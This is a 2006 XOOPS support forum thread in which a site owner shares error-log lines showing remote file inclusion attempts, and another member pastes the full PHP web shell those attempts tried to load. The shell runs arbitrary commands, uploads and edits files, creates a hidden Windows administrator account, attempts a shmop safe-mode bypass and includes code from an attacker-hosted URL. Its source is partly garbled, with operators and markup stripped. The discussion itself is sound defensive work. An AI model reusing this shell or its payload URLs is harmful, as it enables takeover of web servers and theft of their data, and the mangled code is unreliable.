XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. XOOPS general usage questions 
  4.  / Somebody search for xoops bug-s
Register
1
mojportal
Somebody search for xoops bug-s

  • 2006/11/5 17:34

  • mojportal

  • Just popping in

  • Posts: 14

  • Since: 2005/7/2 2



[Sun Nov  5 18:23:27 2006] [error] [client 200.170.229.200File does not exist: /home/xxx/public_html/modules/xoopspartners/admin/includes&config[path]=http://molganinovo.ru/c.php.txt

[Sun Nov  5 18:23:24 2006] [error] [client 200.170.229.200File does not exist: /home/xxx/public_html/modules/system/includes&config[path]=http://molganinovo.ru/c.php.txt



I see this error message in error log. Not just this IP and this two path's. Is this script, c.php.txt can make trouble?
2
Will_H
Re: Somebody search for xoops bug-s

  • 2006/11/5 21:44

  • Will_H

  • Friend of XOOPS

  • Posts: 1786

  • Since: 2004/10/10


c.php.txt


























By chaos







A:link {text-decoration:none}



A:visited {text-decoration:none}



A:hover {text-decoration:underline}



A:active {text-decoration:underline}






















 @set_time_limit(0);







 $string $_SERVER['QUERY_STRING'];



 $mhost 'LINK_OF_CONF/NAME.txt';



 $host_all explode("$mhost"$string);



 $s1 $host_all[0];



 $fstring $_SERVER['PHP_SELF']."?".$s1.$mhost;







 $OS = @PHP_OS;



 $IpServer '127.0.0.1';



 $UNAME = @php_uname();



 $PHPv = @phpversion();



 $SafeMode = @ini_get('safe_mode');







 if ($SafeMode == '') { $SafeMode "OFF"; }



 else { $SafeMode "$SafeMode"; }







 $btname 'backtool.txt';



 $bt 'http://www.full-comandos.com/jobing/r0nin';



 $dc 'http://www.full-comandos.com/jobing/dc.txt';



 $newuser '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';



 // Java Script



 echo "text/javascript">";



 echo "function ChMod(chdir, file) {";



 echo "var o = prompt('Chmod: - Exemple: 0777', '');";



 echo "if (o) {";



 echo "window.location="" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + "";";



 echo "}";



 echo "}";



 echo "function Rename(chdir, file, mode) {";



 echo "if (mode == 'edit') {";



 echo "var o = prompt('Rename file '+ file + ' for:', '');";



 echo "}";



 echo "else {";



 echo "var o = prompt('Rename dir '+ file + ' for:', '');";



 echo "}";



 echo "if (o) {";



 echo "window.location="" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +"";";



 echo "}";



 echo "}";



 echo "function Copy(chdir, file) {";



 echo "var o = prompt('Copied for:', '/tmp/' + file);";



 echo "if (o) {";



 echo "window.location="" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + "";";



 echo "}";



 echo "}";



 echo "function Mkdir(chdir) {";



 echo "var o = prompt('Which name?', 'NewDir');";



 echo "if (o) {";



 echo "window.location="" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + "";";



 echo "}";



 echo "}";



 echo "function Newfile(chdir) {";



 echo "var o = prompt('Which name?', 'NewFile.txt');";



 echo "if (o) {";



 echo "window.location="" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + "";";



 echo "}";



 echo "}";



 echo "";







 // End JavaScript







    /* Functions */



    function cmd($CMDs) {



        $CMD[1] = '';



        exec($CMDs$CMD[1]);



        if (empty($CMD[1])) {



            $CMD[1] = shell_exec($CMDs);



        }



            elseif (empty($CMD[1])) {



            $CMD[1] = passthru($CMDs);



        }



        elseif (empty($CMD[1])) {



            $CMD[1] = system($CMDs);



        }



        elseif (empty($CMD[1])) {



            $handle popen($CMDs'r');



            while(!feof($handle)) {



                $CMD[1][] .= fgets($handle);



            }



            pclose($handle);



        }



        return $CMD[1];



    }



 



if (@$_GET['chdir']) {



 $chdir $_GET['chdir']; 



} else {



   $chdir getcwd()."/";



  }



if (@chdir("$chdir")) {



 $msg "#008000">Entrance in the directory, OK!";



} else {



 $msg "#FF0000">Error to enters it in the directory!";



 $chdir str_replace($SCRIPT_NAME""$_SERVER['SCRIPT_NAME']);



}



 $chdir str_replace(chr(92), chr(47), $chdir);







if (@$_GET['action'] == 'upload') {



 $uploaddir $chdir;



 $uploadfile $uploaddir$_FILES['userfile']['name'];



 if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir $_FILES['userfile']['name'])) {



  $msg "#008000">{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully.";



 } else {



    $msg "#FF0000">Error when copying archive.";



   }



}



elseif (@$_GET['action'] == 'mkdir') {



    $newdir $_GET['newdir'];



    if (@mkdir("$chdir"."$newdir")) {



     $msg "#008000">{$newdir}, directory created successfully.";



    } else {



       $msg "#FF0000">Error to it creates directory.";



      }



}



elseif (@$_GET['action'] == 'newfile') {



    $newfile $_GET['newfile'];



    if (@touch("$chdir"."$newfile")) {



     $msg "#008000">{$newfile}, created successfully!";



    } else {



       $msg "#FF0000">Error to tries it creates archive.";



      }



}







elseif (@$_GET['action'] == 'del') {



     $file $_GET['file']; $type $_GET['type'];



     if ($type == 'file') {



      if (@unlink("$chdir"."$file")) {



       $msg "#008000">{$file}, successfully excluded archive!";



      } else {



         $msg "#FF0000">Error to it I excluded archive!";



        }



     } elseif ($type == 'dir') {



        if (@rmdir("$chdir"."$file")) {



          $msg "#008000">{$file}, successfully excluded directory!";



        } else {



           $msg "#FF0000">Error to it I excluded directory!";



          }



       }



}



elseif (@$_GET['action'] == 'chmod') {



     $file $chdir.$_GET['file']; $chmod $_GET['chmod'];



     if (@chmod ("$file"$chmod)) {



  



      $msg "#008000">Chmod of {$_GET['file']} moved for $chmod successfully.";



     } else {



        $msg 'Error when moving chmod.';



       }



}



elseif (@$_GET['action'] == 'rename') {



     $file $_GET['file']; $newname $_GET['newname'];



     if (@rename("$chdir"."$file""$chdir"."$newname")) {



      $msg "#008000">Archive {$file} named for {$newname} successfully!";



     } else {



        $msg "#FF0000">Error to it nominates archive.";



       }



}



elseif (@$_GET['action'] == 'copy') {



    $file $chdir.$_GET['file']; $copy $_GET['fcopy'];



    if (@copy("$file""$copy")) {



     $msg "#000080">{$file}, copied for {$copy} successfully!";



    } else {



       $msg "#FF0000">Error when copying {$file} for {$copy}";



      }



}



/* Parte Atualiza 02:48 12/2/2006 */







elseif (@$_GET['action'] == 'cmd') {



    if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }



    if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }



    $cmd stripslashes(trim($cmd));



    $result_arr cmd($cmd);



    



    $afim count($result_arr); $acom 0$msg '';



    $msg .= "color#000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2">Results: ".$cmd."

";



    if ($result_arr) {



        while ($acom <= $afim) {



            $msg .= "color#008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2"> ".@$result_arr[$acom]."

";



        $acom++;



         }



    }



    else {



        $msg .= "color#FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2">Erro ao executar comando.

";



    }



}



elseif (@$_GET['action'] == 'safemode') {



if (@!extension_loaded('shmop')) {



 echo "Loading... module
";







    if (strtoupper(substr(PHP_OS0,3) == 'WIN')) {



        @dl('php_shmop.dll');



    } else {



        @dl('shmop.so');



    }



}







if (@extension_loaded('shmop')) {



 echo "Module: shmop loaded!
";







 $shm_id = @shmop_open(0xff2"c"0644100);



 if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }



 $data="\x00";



 $offset=-3842685;



 $shm_bytes_written = @shmop_write($shm_id$data$offset);



 if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }



 if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }



 echo passthru("id"); 



 shmop_close($shm_id);











} else { echo "Module: shmop not loaded!
"; }



}







elseif (@$_GET['action'] == 'zipen') {



 $file $_GET['file'];



 $zip = @zip_open("$chdir"."$file");



 $msg '';



if ($zip) {







    while ($zip_entry zip_read($zip)) {



        $msg .= "Name:               " zip_entry_name($zip_entry) . "\n";



        $msg .= "Actual Filesize:    " zip_entry_filesize($zip_entry) . "\n";



        $msg .= "Compressed Size:    " zip_entry_compressedsize($zip_entry) . "\n";



        $msg .= "Compression Method: " zip_entry_compressionmethod($zip_entry) . "\n";







        if (zip_entry_open($zip$zip_entry"r")) {



            echo "File Contents:\n";



            $buf zip_entry_read($zip_entryzip_entry_filesize($zip_entry));



            echo "$buf\n";







            zip_entry_close($zip_entry);



        }



        echo "\n";







    }







    zip_close($zip);







}



}



elseif (@$_GET['action'] == 'edit') {



 $file $_GET['file'];



 $conteudo '';



 $filename "$chdir"."$file";



 $conteudo = @file_get_contents($filename);



 $conteudo htmlspecialchars($conteudo);



 $back $_SERVER['HTTP_REFERER'];



 echo "center">Editing {$file} ...

";



 echo "0" cellpadding="0" cellspacing="0" style="border-collapsecollapse" width="100%" id="editacao">";



 echo "";



 echo "100%">";



 echo "POST" action="{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}">";



 echo "center">";



 print "18" name="S1" cols="89" style="font-familyVerdanafont-size10ptborder1px solid #000000">{$conteudo}

";



 echo "center">";



 echo "submit" value="Save" name="B2" style="font-familyTahomafont-size10pxborder1px solid #000000"> ";



 echo "button" value="Closes Publisher" Onclick="javascript:window.location='{$fstring}&chdir={$chdir}'" name="B1" style="font-familyTahomafont-size10pxborder1px solid #000000"> ";



 echo "";



 echo "";



 echo "";



 echo "";



}



elseif (@$_GET['action'] == 'save') {



   $filename "$chdir".$_GET['file'];



   $somecontent $_POST['S1'];



   $somecontent stripslashes(trim($somecontent));



   if (is_writable($filename)) {



    @$handle fopen ($filename"w");



    @$fw fwrite($handle$somecontent);



    @fclose($handle);



    if ($handle && $fw) {



     $msg "#000080">{$_GET['file']}, edited successfully!";



    }



 } else {



    $msg "#000000">{$_GET['file']}, cannot be written!";



   }



}







// Informa��es



 $cmdget '';



 if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }



 if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }



 $cmdget htmlspecialchars($cmdget);



 function asdads() {



  $asdads '';



  if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }



  if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }



  if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }



  if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }



  if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }



  return $asdads;



 }







echo "POST" name="cmd" action="{$fstring}&amp;action=cmd&amp;chdir=$chdir">";



echo "border1px solid #000000; padding: 2">";



echo "Informa��es";



echo "0" cellpadding="0" cellspacing="0" style="border-collapsecollapsefont-familyTahomafont-size10px" width="100%">";



echo "";



echo "8%">";



echo "right">Sistema: 

";



echo "92%"> {$OS}";



echo "";



echo "";



echo "8%">";



echo "right">Uname: 

";



echo "92%"> {$UNAME}";



echo "";



echo "";



echo "8%">";



echo "right">PHP: 

";



echo "92%"> {$PHPv}safe mode: {$SafeMode}";



echo "";



 if (strtoupper(substr($OS0,3) != 'WIN')) {



  $Methods asdads();



  if ($Methods == '') { $Methods "???"; }



  echo "";



  echo "8%">";



  echo "right">Methods: 

";



  echo "92%"> {$Methods}";



  echo "";



 }







echo "";



echo "8%">";



echo "right">Ip: 

";



echo "92%"> {$IpServer}";



echo "";



echo "";



echo "8%">";



echo "right">Command: 

";



echo "92%"> text" size="70" name="cmd" value="{$cmdget}" style="font-familyTahomafont-size10 pxborder1px solid #000000"> ";



echo "";



echo "";



echo "";



// Dir







echo "POST" action="{$fstring}&amp;action=upload&amp;chdir=$chdir" enctype="multipart/form-data">";



echo "border1px solid #000000; padding: 2">";



if (is_writable("$chdir")) {



 if (strtoupper(substr($OS0,3) == 'WIN')) {



  echo "Dir YES{$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [Remote Access]";



 } else {



    echo "Dir YES{$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [BackTool]";



   



}



else {



if (strtoupper(substr($OS0,3) == 'WIN')) {



  echo "Dir NO: {$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [Remote Access]";



 } else {



    echo "Dir NO: {$chdir} - #[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir] [New File] [BackTool]";



   



}







if (@!$handle opendir("$chdir")) {



 echo " I could not enters in the directory, {$fstring}">click here! for return to the original directory!
";



}



else {



echo "  0" cellpadding="0" cellspacing="0" style="border-collapsecollapsefont-familyTahomafont-size10px" width="100%">";



echo "    ";



echo "      100%" style="font-familyTahomafont-size10px" colspan="4"> Upload:";



echo "      file" name="userfile" size="91" style="font-familyTahomafont-size10pxborder-stylesolidborder-width1">";



echo "      submit" value="Send" name="B1" style="font-familyTahomafont-size10pxborder1px solid #000000">";



echo "    ";



echo "    ";



echo "      100%" style="font-familyTahomafont-size10px" colspan="4"> ";



echo "    ";



echo "    ";



echo "      100%" style="font-familyTahomafont-size10px" colspan="4">";



if (@!$msg) {



 echo "      left">Messages";



} else {



   echo "      left">$msg";



  }



echo "    ";



echo "    ";



echo "      100%" colspan="4"> ";



echo "    ";



echo "    ";



echo "      9%"> Perms";



echo "      49%"> File ";



echo "      10%"> Size ";



echo "      32%"> Commands";



echo "    ";



$colorn 0;



    while (false !== ($file readdir($handle))) {



        if ($file != '.') {



            if ($colorn == 0) {



             $color "style="background-color#FFCC66"";



            }



            elseif ($colorn == 1) {



             $color "style="background-color#C0C0C0"";



            }        



            if (@is_dir("$chdir"."$file")) {



             $file $file.'/';



             $mode 'chdir';



            } else { 



               $mode 'edit'



             }



            if (@substr("$chdir"strlen($chdir) -11) != '/') {



              $chdir .= '/';



            }



            if ($file == '../') {



             $lenpath strlen($chdir); $baras 0;



             for ($i 0;$i $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }



             $chdir_ explode("/"$chdir);



             $chdirpox str_replace($chdir_[$baras-1].'/'""$chdir);



            }



            $perms = @fileperms ("$chdir"."$file");



            if ($perms == '') {



             $perms '???';



            }



            $size = @filesize ("$chdir"."$file"); 



            $size $size 1024;



            $size explode("."$size);



            if (@$size[1] != '') {



             $size $size[0].'.'.@substr("$size[1]"02);



            } else {



               $size $size[0];



             }



            if ($size == 0) {



             if ($mode == 'chdir') {



              $size '???';



             }



            }



            echo "";



        echo "9%$color$perms";



            if (@is_writable ("$chdir"."$file")) {



             if ($mode == 'chdir') {



              if ($file == '../') {



               echo "49%$color{$fstring}&amp;chdir=$chdirpox">$file";



              } else {



                 echo "49%$color{$fstring}&amp;chdir={$chdir}{$file}">$file";                



                }



             } else {



        if (is_readable("$chdir"."$file")) {



                 echo "49%$color{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file";



                } else {



                   echo "49%$color$file";



                  }



               }



            } 



           else {



             if ($mode == 'chdir') {



              if ($file == '../') {



               echo "49%$color{$fstring}&amp;chdir=$chdirpox">$file";



              } else {



                 echo "49%$color{$fstring}&amp;chdir={$chdir}{$file}">$file";                



               }



             } else {



        if (@is_readable("$chdir"."$file")) {



                 echo "49%$color{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file";



                } else {



                   echo "49%$color$file";



                 }



               }



             }



            echo "10%$color$size KB";



            if ($mode == 'edit') {



             echo "32%$color#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename] [Del] [Chmod] [Copy]";



            } else {



               echo "32%$color#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename] [Del] [Chmod] [Copy]";



              }   



            echo "";



            if ($colorn == 0) {



             $colorn 1;



            }



            elseif ($colorn == 1) {



             $colorn 0;



            }



        }



    }



    closedir($handle);



}



include 'http://molganinovo.ru/cmd2.txt';



?>



  



  



  



    


        src="http://www.w3.org/Icons/valid-html401"



        alt="Valid HTML 4.01 Transitional" height="31" width="88">



  
















...nice
3
Cuidiu
Re: Somebody search for xoops bug-s

  • 2006/11/5 23:15

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


EDITED: Just noticed I banned that IP long ago.

I don't use the xoopspartners module but do use smartpartner. Should I ban the IP?
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]
4
m0nty
Re: Somebody search for xoops bug-s

  • 2006/11/5 23:31

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


i would ban any IP that shows an attempt like that on your site.
5
Will_H
Re: Somebody search for xoops bug-s

  • 2006/11/6 2:53

  • Will_H

  • Friend of XOOPS

  • Posts: 1786

  • Since: 2004/10/10


I believe that is referred to as an understatement.

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

76 user(s) are online (57 user(s) are browsing Support Forums)

Members: 0

Guests: 76

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Jun 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits